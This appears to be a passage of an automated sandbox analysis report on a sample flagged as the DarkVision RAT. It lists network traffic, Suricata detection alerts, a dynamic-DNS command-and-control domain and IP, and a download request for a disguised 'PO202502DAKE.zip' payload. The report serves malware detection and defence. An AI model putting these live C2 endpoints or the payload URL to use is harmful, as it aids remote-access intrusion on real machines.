                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 149.137.128.16:443 -> 192.168.2.4:49722
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49731 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49733 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49730 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49734 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49735 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49732 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49744 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49745 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49749 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49751 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49740 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49750 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49758 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49755 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49753 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49756 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49757 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49765 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49752 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49766 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49770 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.4:49758 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49743 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.4:49765 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49759 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49768 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49760 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49763 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49747 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49769 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49761 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49746 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.4:49752 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49748 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49773 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49775 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49754 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49774 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49776 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49781 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49762 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49784 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49779 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49771 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.4:49771 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.4:49746 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49777 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.4:49777 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49741 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49778 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49782 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49783 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49772 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.4:49740 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.4:49783 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49742 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.4:49730 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49780 -> 84.38.129.34:3369
                          Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49767 -> 84.38.129.34:3369
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: myasyncrat.ddns.net
                          Uses dynamic DNS services
                          Source: unknownDNS query: name: myasyncrat.ddns.net
                          Source: global trafficTCP traffic: 192.168.2.4:49730 -> 84.38.129.34:3369
                          Source: Joe Sandbox ViewIP Address: 149.137.128.16 149.137.128.16
                          Source: Joe Sandbox ViewIP Address: 13.107.246.60 13.107.246.60
                          Source: Joe Sandbox ViewASN Name: DATACLUB-NL DATACLUB-NL
                          Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
                          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 13.107.246.60:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 13.107.246.60:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 13.107.246.60:443
                          Source: global trafficHTTP traffic detected: GET /file/mdocument/PO202502DAKE.zip HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: f004.backblazeb2.comConnection: Keep-Alive
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_0000000140024D00 recv,16_2_0000000140024D00
                          Source: global trafficHTTP traffic detected: GET /file/mdocument/PO202502DAKE.zip HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: f004.backblazeb2.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                          Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                          Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                          Source: global trafficDNS traffic detected: DNS query: f004.backblazeb2.com
                          Source: global trafficDNS traffic detected: DNS query: myasyncrat.ddns.net
                          Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
                          Source: 7z.exe, 00000009.00000003.1298204632.0000018569650000.00000004.00000800.00020000.00000000.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316165651.00000273D2C02000.00000004.00001000.00020000.00000000.sdmp, PO202502DAKE.exe.12.dr, PO202502DAKE.exe.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
